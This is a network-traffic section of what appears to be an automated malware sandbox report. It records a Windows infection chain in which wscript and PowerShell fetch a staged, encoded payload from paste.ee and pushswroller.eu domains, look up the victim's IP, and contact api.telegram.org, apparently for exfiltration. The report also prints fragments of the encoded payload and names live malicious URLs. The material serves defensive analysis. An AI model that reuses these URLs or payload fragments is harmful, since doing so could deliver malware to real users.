                                                                                                                                                                      Nov 26, 2024 09:33:32.220398903 CET8049719193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:33.366583109 CET8049719193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:33.367872000 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:33.367913961 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:33.368056059 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:33.368386984 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:33.368396997 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:33.519124031 CET4971980192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:34.672852039 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:34.674637079 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:34.674689054 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:35.137727022 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:35.137820005 CET44349720172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:35.137878895 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:35.138401031 CET49720443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:35.142246962 CET4971980192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:35.143337011 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:35.262394905 CET8049719193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:35.263358116 CET8049721193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:35.265145063 CET4971980192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:35.265196085 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:35.265439034 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:35.385257959 CET8049721193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:36.536338091 CET8049721193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:36.537771940 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:36.537836075 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:36.537919044 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:36.538203955 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:36.538220882 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:36.722275019 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:37.748730898 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:37.750538111 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:37.750586033 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:38.196671009 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:38.196746111 CET44349722172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:38.196789026 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:38.197531939 CET49722443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:38.205074072 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:38.206737995 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:38.326602936 CET8049721193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:38.326666117 CET4972180192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:38.327542067 CET8049723193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:38.327615023 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:38.327847958 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:38.449676991 CET8049723193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:39.595376015 CET8049723193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:39.596935987 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:39.596987009 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:39.597071886 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:39.597662926 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:39.597681046 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:39.644130945 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:40.858061075 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:40.865195990 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:40.865242004 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:41.335335016 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:41.335412025 CET44349724172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:41.335606098 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:41.336173058 CET49724443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:41.340166092 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:41.341245890 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:41.460442066 CET8049723193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:41.460500002 CET4972380192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:41.461150885 CET8049725193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:41.461230040 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:41.461373091 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:41.581337929 CET8049725193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:42.821469069 CET8049725193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:42.824779987 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:42.824841022 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:42.824937105 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:42.825295925 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:42.825318098 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:42.909796000 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.082997084 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.084892988 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:44.084919930 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.536648989 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.536717892 CET44349726172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.536762953 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:44.537404060 CET49726443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:44.540631056 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.541814089 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.660945892 CET8049725193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.661030054 CET4972580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.661667109 CET8049727193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:44.661732912 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.661973953 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:44.781842947 CET8049727193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:46.021223068 CET8049727193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:46.023345947 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:46.023447990 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:46.023540020 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:46.023964882 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:46.023998976 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:46.066059113 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:47.327197075 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.329268932 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:47.329297066 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.793689966 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.793776035 CET44349728172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.794013977 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:47.794411898 CET49728443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:47.836870909 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:47.957324028 CET8049727193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.957427025 CET4972780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:47.980376005 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:47.980420113 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.980684996 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:47.981312037 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:47.981328011 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.428266048 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.428353071 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.430799007 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.430814028 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.431024075 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.432746887 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.479332924 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942435980 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942513943 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942584038 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.948767900 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:55.771116018 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:56.217504978 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.337872982 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.338011980 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.344841957 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.350992918 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.465641975 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.472419024 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.473304987 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:57.664963007 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:57.722353935 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:34:02.674192905 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:34:02.674285889 CET4973180192.168.2.845.80.158.30

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 26, 2024 09:32:47.979490995 CET5938053192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:32:48.126389980 CET53593801.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:54.681189060 CET5618053192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:32:54.999164104 CET53561801.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:15.807049990 CET5664753192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:33:16.127003908 CET53566471.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:19.222898006 CET6437353192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET53643731.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.594911098 CET5360753192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:33:21.734663963 CET53536071.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:47.837759972 CET6177553192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:33:47.979197025 CET53617751.1.1.1192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:55.886491060 CET5808053192.168.2.81.1.1.1
                                                                                                                                                                      Nov 26, 2024 09:33:56.213754892 CET53580801.1.1.1192.168.2.8

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 26, 2024 09:32:47.979490995 CET192.168.2.81.1.1.10x3bcbStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:32:54.681189060 CET192.168.2.81.1.1.10x45bcStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:15.807049990 CET192.168.2.81.1.1.10xa00aStandard query (0)sbv.pushswroller.euA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.222898006 CET192.168.2.81.1.1.10x1e87Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:21.594911098 CET192.168.2.81.1.1.10xeb2fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:47.837759972 CET192.168.2.81.1.1.10x8b14Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:55.886491060 CET192.168.2.81.1.1.10xb926Standard query (0)sws.swpushroller.euA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 26, 2024 09:32:48.126389980 CET1.1.1.1192.168.2.80x3bcbNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:32:48.126389980 CET1.1.1.1192.168.2.80x3bcbNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:32:54.999164104 CET1.1.1.1192.168.2.80x45bcNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:32:54.999164104 CET1.1.1.1192.168.2.80x45bcNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:16.127003908 CET1.1.1.1192.168.2.80xa00aNo error (0)sbv.pushswroller.eu5.182.211.149A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:19.363226891 CET1.1.1.1192.168.2.80x1e87No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:21.734663963 CET1.1.1.1192.168.2.80xeb2fNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:21.734663963 CET1.1.1.1192.168.2.80xeb2fNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:47.979197025 CET1.1.1.1192.168.2.80x8b14No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 26, 2024 09:33:56.213754892 CET1.1.1.1192.168.2.80xb926No error (0)sws.swpushroller.eu45.80.158.30A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • paste.ee
                                                                                                                                                                      • 3105.filemail.com
                                                                                                                                                                      • reallyfreegeoip.org
                                                                                                                                                                      • api.telegram.org
                                                                                                                                                                      • sbv.pushswroller.eu
                                                                                                                                                                      • checkip.dyndns.org
                                                                                                                                                                      • sws.swpushroller.eu

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.849705104.21.84.67807800C:\Windows\System32\wscript.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:32:48.265235901 CET173OUTGET /d/MQJcS HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                      Host: paste.ee
                                                                                                                                                                      Nov 26, 2024 09:32:49.490083933 CET977INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:32:49 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Location: https://paste.ee/d/MQJcS
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg3AkdCzGUZ5tjeDDFDe8Qa9N7bqK6B4XVqqzQ6yKHX6YYhr1tHGV1iXzWT6jPwjewraqy4Ze4NCQH%2BH53y9v9VkQnvr1WCMGNMPKOiaQV2T6r1fKV%2F5B%2By%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8887b37d94de94-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                      Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.8497115.182.211.149808064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:16.248311043 CET81OUTGET /gfy/gesr.txt HTTP/1.1
                                                                                                                                                                      Host: sbv.pushswroller.eu
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:17.533216953 CET251INHTTP/1.1 200 OK
                                                                                                                                                                      etag: "43aac-67447ce9-1b92d5;;;"
                                                                                                                                                                      last-modified: Mon, 25 Nov 2024 13:34:33 GMT
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      content-length: 277164
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      date: Tue, 26 Nov 2024 08:33:17 GMT
                                                                                                                                                                      server: LiteSpeed
                                                                                                                                                                      connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:17.533777952 CET1236INData Raw: 3d 67 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52 55 51 51 68 46 57 48 35 55 53 45 52 55 51 51 64 6b 54 4a 52 45 52 42 42 46 57 59 64 6b 54 4a 52 45 52 42 42 31 52 4f 6c 45 52 45 46 45 55 59 68 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52
                                                                                                                                                                      Data Ascii: =g1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRE
                                                                                                                                                                      Nov 26, 2024 09:33:17.533790112 CET1236INData Raw: 67 55 47 62 69 46 6d 62 46 42 53 4c 74 45 43 50 67 41 69 43 4e 6f 51 44 2b 30 53 4c 67 41 69 43 4e 34 6a 62 76 6c 47 64 68 4e 57 61 73 42 48 63 68 39 43 50 67 41 69 43 4e 34 7a 63 6e 35 57 61 30 52 58 5a 54 4e 33 64 76 52 6d 62 70 64 33 4c 38 41
                                                                                                                                                                      Data Ascii: gUGbiFmbFBSLtECPgAiCNoQD+0SLgAiCN4jbvlGdhNWasBHch9CPgAiCN4zcn5Wa0RXZTN3dvRmbpd3L8ACIgAiCN4TZyF2dBlGck9CPlVnc05jIzdmbpRHdlN1c39GZul2VvUDMwIzLJ10Uv02bj5Cdm92cvJ3Yp1mLzFWblh2Yz9yL6AHd0hmI9Mnbs1GegUmchdXQpBHZ8ACIgACIgoQD+M3ZulGd0V2Uzd3bk5Wa3xDIgAC
                                                                                                                                                                      Nov 26, 2024 09:33:17.533801079 CET1236INData Raw: 67 41 43 49 67 41 43 49 4b 30 67 43 4e 34 54 4c 74 34 7a 4c 67 49 53 66 34 4d 54 5a 32 45 47 4e 68 52 44 5a 35 59 44 5a 74 4d 57 4f 68 4a 57 4c 78 51 44 4e 30 30 53 4f 69 4e 54 4e 74 4d 54 5a 34 49 6a 5a 79 45 47 4e 37 4a 53 50 6b 6c 45 49 54 39
                                                                                                                                                                      Data Ascii: gACIgACIK0gCN4TLt4zLgISf4MTZ2EGNhRDZ5YDZtMWOhJWLxQDN00SOiNTNtMTZ4IjZyEGN7JSPklEIT9EZlRncvBHc1NHPt0SI8ACIgACIgoQD+0SLggDIzd3bk5WaXBSLtECPgACIgACIK0gCN4TLt4zLgISfhNTOmVjMyADN0ITYtQmMlhTLkJmZ00iN5QWNtEWOihzMxUzM7JSPklEIT9EZlRncvBHc1NHPt0SI8ACIgAC
                                                                                                                                                                      Nov 26, 2024 09:33:17.533811092 CET672INData Raw: 67 41 43 49 67 41 43 49 67 41 69 43 4e 41 69 4c 75 39 57 61 30 46 6d 65 70 78 57 59 31 52 6e 63 70 5a 48 49 35 4a 48 64 7a 6c 32 5a 6c 4a 48 49 6b 35 57 59 67 55 47 62 70 5a 47 49 6c 78 6d 59 68 4e 58 61 6b 42 43 62 73 6c 32 64 67 51 6e 62 6c 31
                                                                                                                                                                      Data Ascii: gACIgACIgAiCNAiLu9Wa0FmepxWY1RncpZHI5JHdzl2ZlJHIk5WYgUGbpZGIlxmYhNXakBCbsl2dgQnbl1WZsVGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHIn5Wa5ZWajVGcTBCIgACIgACIgACIgoQDK0gPvAiIlNHbhZmI9M3clN2YBlWdgISZsJWYslWY2FEdzVGanlGai0DblZXZsBCIsVmdlxkbvlGd1NWZ4VEZlR3clVX
                                                                                                                                                                      Nov 26, 2024 09:33:17.533823013 CET1236INData Raw: 67 41 43 49 67 41 43 49 67 6f 51 44 7a 35 32 62 70 52 48 63 50 42 43 64 7a 56 6d 5a 70 35 57 59 4e 42 79 51 42 56 46 49 74 30 53 49 38 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 50 69 4d 6a 64 75 30 32 63 68 70 54 62 76 4e 57 4c 30 5a 32 62 7a 39
                                                                                                                                                                      Data Ascii: gACIgACIgoQDz52bpRHcPBCdzVmZp5WYNByQBVFIt0SI8ACIgACIgACIK0gPiMjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BycldWZslmdpJHUkVGdzVWdxVmc8ACIgACIgoQD+kHdpJXdjV2c8ACIgAiCN4jIyYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1Geg8mZulEdzVnc0xD
                                                                                                                                                                      Nov 26, 2024 09:33:17.533834934 CET1236INData Raw: 75 42 51 5a 41 30 47 41 74 42 77 62 41 4d 45 41 42 41 51 41 41 6f 42 41 41 41 41 4d 41 49 47 41 30 41 41 4d 41 41 44 41 77 41 41 4d 41 41 44 41 42 41 41 41 43 67 46 41 41 41 77 62 41 59 47 41 75 42 51 53 41 55 47 41 73 42 51 61 41 59 45 41 6e 42
                                                                                                                                                                      Data Ascii: uBQZA0GAtBwbAMEABAQAAoBAAAAMAIGA0AAMAADAwAAMAADABAAACgFAAAwbAYGAuBQSAUGAsBQaAYEAnBgbAkGAyBAdAMFABAAACwHBwCAAAAAAAAgbA8GApBAdAEGAsBwcA4GAhBgcAQFAAAABAQCAAAAAA8GAmBgbAkEAlBAbAkGAGBgcAEGAWBQAAAAAEBAAAAAAAAAAAAAAAAAAAEAAAAABAAAAAAAAA8DAAAAAAEAAAAA
